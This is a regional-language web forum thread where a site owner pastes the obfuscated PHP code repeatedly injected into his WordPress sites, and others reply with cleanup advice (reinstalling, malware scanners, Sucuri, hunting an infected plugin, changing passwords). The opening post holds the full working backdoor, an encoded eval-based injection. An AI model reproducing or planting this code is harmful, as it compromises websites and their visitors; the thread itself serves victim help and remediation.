WordPress Hakovan!

Neko mi konstanto provaljuje u wordpress stranice i dodaje kod:

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $grlwtrkjxr = ']y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:5):fmji%x5c%x7878:<##:>:U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)4-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x578e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258M*<%x22%51%x29%51%x29%73", NULL); }&w6<%x5c%x787fw6*CW&)7g]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x5c%x7825,3,j%x5c%x7825>j%x5c%x7)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860oX&Z&S{ftmfV%x5c%x787f<*if((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (!iz>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825#372]58y]472]37y]672]48y]#3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%xx785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85]2~!Ydrr)%x5c%x7825r%x5c%x7878Bsfux61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%x70%15T-%x5c%x7825hW~%x5c%x7825fdy)x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN#>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x786043%x7825bbT-%x5c%x7825b5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!%x5c%x7824b!>!%x5c%x1);} @error_reporting(0); preg_replace("x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5cx5c%x7825j^%x5c%x7824-%x5c%x7c%x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]24#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x75c%x7825w%x5c%x7860TW~%x5c%x7824<%x5]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%%x5c%x7824%x5c%x785c%pf{jt)!gj!<*2bd%x5c%x7825-#1GO%x824-%x5c%x7824-!%x5c%x7825%x5c%x78t!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsv7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<25tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825bx5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%445]212]445]43]321]464]284]364]6]234]342]58]24]31#-7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6%x5c%x7825tmw!>!#]y84]275]82]y76]62]y3:]84#-!OVMc%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x782%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x>s%x5c%x7825<#462]47y]252]18y]#>q4%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%50x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%xopjudovg}k~~9{d%x5c%x78255)ftpmdR6<*id%x5c%x7825)dfy825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x%x785cq%x5c%x78257%x5c%r%x5c%x785c2^-%x5c%x7825hOh%x59275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x782o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%7825j:=tj{fpg)%x5c%x7825s:*5c%x7825)7fmji%x5c%x787fvr#%x5c%x785cq%x5c%x788b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c824tvctus)%x5c%x7825%x5c%x7824-;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)86<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<x7860ufh%x5c%x7860fmjg}[;lj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fm]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>%x782fr%x5c%x7825%x5c%x7c%x782f#00#W~!%x5c%x7825PT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c7gj6<**2qj%x5c%x7825)hopm%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Du%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]27**111127-K)ebfsX%x5c%x7827u%xuyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%]y6g]273]y76]271]y7d]252]y74]256#<!97g:74985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%c%x782272qj%x5c%x7825)c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y850ftsbqA7>q%x5c%x78256<%x5c%x7876]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~t2w)##Qtjw)#]82#-#!#-%x5c%x787824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827iddpt%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5mt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%7825yy)#}#-#%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%xsutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5sset($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%156%x7.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5cc%x7825o:!>!%x5c%x78242178}527}88:}334}472%x5)sfebfI{*w%x5c%x7825)kV%x5c%x7877860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x782#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c82fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x525)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%pg)%x5c%x7825%x5c%x782fs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x7c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:<#opo#>b%x5c%x7825!*#<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x786c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{f%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x78255c%x782f#%x5c%x782f},;#-#}+;%x5c%c%x7825)uqpuft%x5c%x7860msvd},;<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5%x787fw6*3qj%x5c%x78257>%x5XAZASV<*w%x5c%x7825)ppde>u%x5c%xx7825-qp%x5c%x7825)54l}uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x782j<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x7860x7878:-!%x5c%x7825tzw%x5c%x782f%x5#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373Px782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#77]y72]265]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]y76]6-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqs5%156%x61"]=1; function fjfgg($n)M7]K3#<%x5c%x7825yy>#0un>qp%x5c%x7825!|Z~!<##!>!]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x55c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zs86]y31]278]y3f]51L3]84]y31M68257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860M24-%x5c%x7824*!|!%x5c%x7824-x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*ss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:612p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusuc%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce47825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5cc%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gc%x7824<!%x5c%x7825mm!>!#]y81]273]y76]2151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%}#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825fR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSx5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827r57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x75)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-42%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7825eN+#Qi%x5c%x785c1^W%58]y6g]273]y76]271]y7d]252!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c22l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5cx7825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x7865c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!g%x2f%50%x2e%52%x29%57%x65","%x65%166%x61%154%x28%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[kvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x55}&;ftmbg}%x5c%x787f;!osvufs}w;*%x825!<**3-j%x5c%x7825-bubE{h%%x7878r.985:52985-t.98]K4]65]D8]x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W{return chr(ord($n)-)3of>2bd%x5c%x7825!<5h%x5c%xhA%x5c%x7827pd%x5c%x78256<pd%x5c%x782825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5w6Z6<.4%x5c%x7860hA%x5*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5%x7827;mnui}&;zepc}A;~!}%x5c%x787fSFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!8{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x78f#<%x5c%x7825tdz>#L4]275L3pjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5jgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x78604-%x5c%x7824*<!~!dsfbuf%x5c%x-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c56]y6g]257]y86]267]y74]272986+7**^%x5c%x782f%x5c%x~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x785c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhAvso!sboepn)%x5c%x7825epnbss-5]y7:]268]y7f#<!%x5c%x7825tww!25)ufttj%x5c%x7822)gj6<^#Y#%x5cx5c%x7825c!>!%x5c%x7825i%x5c%x7874]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x/(.*)/epreg_replacewkhhbcbzhh'; $cgjyeqmjki = explode(chr((295-251)),'457,62,5343,65,7232,33,9018,20,1334,40,8677,49,7939,60,883,68,2595,57,8216,67,3369,67,9066,37,9152,23,7358,55,4727,37,6378,55,5622,51,6700,46,1733,45,4244,30,3323,23,3579,55,3243,53,8110,45,5811,58,7489,47,3992,68,6433,27,4536,22,4060,25,660,68,9604,31,3001,23,6894,64,7413,48,3346,23,9862,31,6145,53,4826,31,3687,42,294,23,3755,45,9439,70,3176,67,2850,27,8041,69,5053,48,1052,67,8726,65,8353,54,3729,26,5101,40,5141,54,6347,31,6515,58,8836,34,1271,43,4908,62,9685,55,5739,50,2652,65,4639,46,8458,69,6100,45,354,33,8870,28,8930,42,8283,70,7077,60,564,70,387,47,9377,62,7832,68,1868,32,9740,64,9038,28,1673,60,4403,63,1778,69,8571,48,7286,27,7680,50,1934,68,5195,51,7168,64,5309,34,7730,50,1521,70,6746,51,9264,45,6062,38,6041,21,1014,38,2185,66,7564,50,4274,46,728,68,6314,33,6492,23,5932,62,2825,25,1184,66,3054,70,6637,63,9103,49,8619,58,6573,64,4685,42,434,23,6460,32,2002,60,8155,61,5582,40,5500,32,9309,42,8527,44,9230,34,3531,48,71,59,4136,67,1119,65,7313,45,6958,55,1627,46,2419,25,796,55,9635,25,9832,30,4466,70,1374,69,3944,24,5673,66,2467,43,47,24,2104,40,634,26,2562,33,3124,52,9175,55,5455,45,7900,39,8432,26,3634,53,1900,34,7536,28,1847,21,1443,29,3500,31,1314,20,5246,63,2302,60,2759,66,4999,54,8791,45,6198,65,5789,22,9509,29,5532,50,174,40,1472,49,9925,69,4558,38,8407,25,9893,32,8972,46,851,32,9804,28,6263,51,519,45,980,34,7999,42,3024,30,3968,24,4970,29,2144,41,7614,66,4355,48,8898,32,7461,28,0,47,2362,57,7265,21,317,37,4085,51,9351,26,3841,62,3800,41,3436,64,1250,21,951,29,130,44,6831,63,4857,51,2251,51,10052,54,2717,42,9660,25,7780,52,2510,52,3296,27,9994,58,5994,47,5408,47,2062,42,7137,31,2877,69,3903,41,2946,55,1591,36,4596,43,6797,34,5869,63,9538,66,214,45,4320,35,4203,41,7013,64,4764,62,2444,23,259,35'); $iykxaeygtl=substr($grlwtrkjxr,(48119-38013),(49-42)); if (!function_exists('tgnjyqryhj')) { function tgnjyqryhj($wxwsvuhsrj, $zjmygrylzc) { $hmefrgrwde = NULL; for($yctigknxqa=0;$yctigknxqa<(sizeof($wxwsvuhsrj)/2);$yctigknxqa++) { $hmefrgrwde .= substr($zjmygrylzc, $wxwsvuhsrj[($yctigknxqa*2)],$wxwsvuhsrj[($yctigknxqa*2)+1]); } return $hmefrgrwde; };} $jbubwwpoxz="\x20\57\x2a\40\x63\154\x65\170\x7a\143\x66\152\x6b\157\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\61\x38\55\x38\61\x29\51\x2c\40\x63\150\x72\50\x28\65\x37\62\x2d\64\x38\60\x29\51\x2c\40\x74\147\x6e\152\x79\161\x72\171\x68\152\x28\44\x63\147\x6a\171\x65\161\x6d\152\x6b\151\x2c\44\x67\162\x6c\167\x74\162\x6b\152\x78\162\x29\51\x29\73\x20\57\x2a\40\x75\156\x72\146\x78\171\x68\172\x6e\155\x20\52\x2f\40"; $ekruulbdab=substr($grlwtrkjxr,(44951-34838),(38-26)); $ekruulbdab($iykxaeygtl, $jbubwwpoxz, NULL); $ekruulbdab=$jbubwwpoxz; $ekruulbdab=(615-494); $grlwtrkjxr=$ekruulbdab-1; ?>

Da li je neko imao slicnih problema, ocistim sve i promjenim login podatke ali nakon desetak dana opet isto. I to ne na jednom WP sajtu nego na svim. Hosting je WebHostingFace.

Šta imaš sve od plugina? Ako je tek instaliran WP, kontaktiraj podršku i objasni im, bilo wordpress bilo hosting podršku. Ali 90% da je preko plugina nekog, možda i teme ako koristiš neku nulled verziju.

Promjeni podatke za server, nakon toga sve wp podatke. Napravi backup wp-content i očisti od virusa. backup baze. Izbriši sve sa servera. Čista wp instalacija, ubaciš wp-content i bazu.

Tak sam se ja riješio, vrag ti je to :wink:

Ja sam primetio npr da su mi na jedan hosting konstantno upadali sta god uradio. Dok na druge nisu nikada. Tako da vrlo moguce da je do nesigurnosti samog hostinga.

Kod mene se povremeno umjesto stranice ili posta otvori uvijek isti YouTube video :frowning: Kontaktirao sam hosting support (Avalon) i oni su kao nešto čistili međutim sve se i dalje ponavlja.

Najvjerojatnije i je do teme ako je nulled. Medjutim, ne mora biti. Meni je recimo na jednoj stranici netko stalno objavljivao nove postove. Stavljao sam sve moguce wp security pluginove, ali na neku foru taj “netko” je stalno uspio upadati unutra i uvijek je iznova znao admin username i pass za WP. Dok na kraju nisam otkrio da je moj PC bio zarazen i da sam imao takvu vrstu malwarea koja je to citala usernae i pass sa mog PC-a i slala ga nekom. Malware bi snimio username i pass, taj “netko” bi se logirao i napisao post.

Najčešče to i jeste posao za “Malwarebytes Anti-Malware”. On to sređuje brzo i sigurno. :slight_smile:

Ili to, ili ga čekati jednu večer u zasjedi na serveru, iza kantuna… :slight_smile:

Malwarebytes Anti-Malware mi našao čak 6 Malwar-a na PC-u, a imam plaćen Avast izgleda da slabo radi (iako mislim da je Anti-Malware jači od Avasta po pitanu Malware fajlova).

Očistiću WP, pa ću vidjeti šta će biti, ako se bude dešavalo opet onda je vjerovatno do hosta.

1 Like

Nedavno sam jednom članu s foruma čistio WP upravo zbog problema navedenog u prvom postu.

Potrebno je skenirati sve datoteke kako bi se izbrisala funkcija koja dodaje navedeni kod.
Također treba vidjeti da nema što skriveno u DB.
Nakon toga očistiti računalo i promijeniti sve lozinke.
Te dodati plugine za zaštitu same stranice.

1 Like

Ovo je istina. Treba uvijek svaku malo, ili kad primijetiš da škripi; proći sa ovim Anti-Malware. :smile:

Znaš li otprilike gdje bi se funkcija mogla nalaziti i kako izgleda, a doduše zamjeniću sve fajlove i samo temu prečistiti, jer ostalo ništa nisam mjenjao, jedino me zeza kako bazu pročistiti ali naću način :smiley:

Postoji program koji se zove TextCrawler, s njima u bulku možeš pregledati sve datoteke od jednom za traženi pojam.

Znači skineš kompletan back-up na desktop i s tim programom tražiš KW koji bi mogao biti sumnjiv.

1 Like

wordpress, joomla, drupal…svejedno, u svakom CMS-u postoji neka rupa koja se kasnije otkrije…
Inače koristim SUCURI za inspekciju webstranice koju trebam čistiti, a ako ne pomaže, sve zipiram u cPanelu i skinem na komp, zatim skeniram AV programom.

Za prvu ruku pokušaj sa Sucuri

1 Like

SUCURI je ok, ali u nekim slucajevima ne pomaze. Pa tako recimo ako u WP footeru imas maliciozni kod u base64, to SUCURI nece otkrit i mozes ga nac jedino “pjeske”. I druga metoda je ok, ali opet ne otkriva sve, jer ne mora na stranici bit virus, kao sto rekoh, maliciozni kod moze biti upakiran u bilo koji file a to antivirus nema sanse da otkrije.

Imali smo par klijenata s istim problemom. Probaj si skinut multifind i plugins folder na komp. Nakon toga provjeri cijeli plugins folder u potrazi za “spamcheckr” gdje ti locira navedeni kod taj plugin ti je zarazen.

2 Likes

Hvala puno na konkretnom savjetu i na spremnosti pomoći. Tako se stvara povjerenje kod korisnika, dovode novi i zadržavaju postojeći. Respekt!

Ne pravi mi skripta redirekt na taj video. Ovo je izgleda drugi tip problema, prebacicu sve na racunar i pregledati pa cu vidjeti u cemu je problem :smiley:


Copyright © 2020 WM Forum - AboutContact - Sponsored by: Mydataknox & Profit Monkey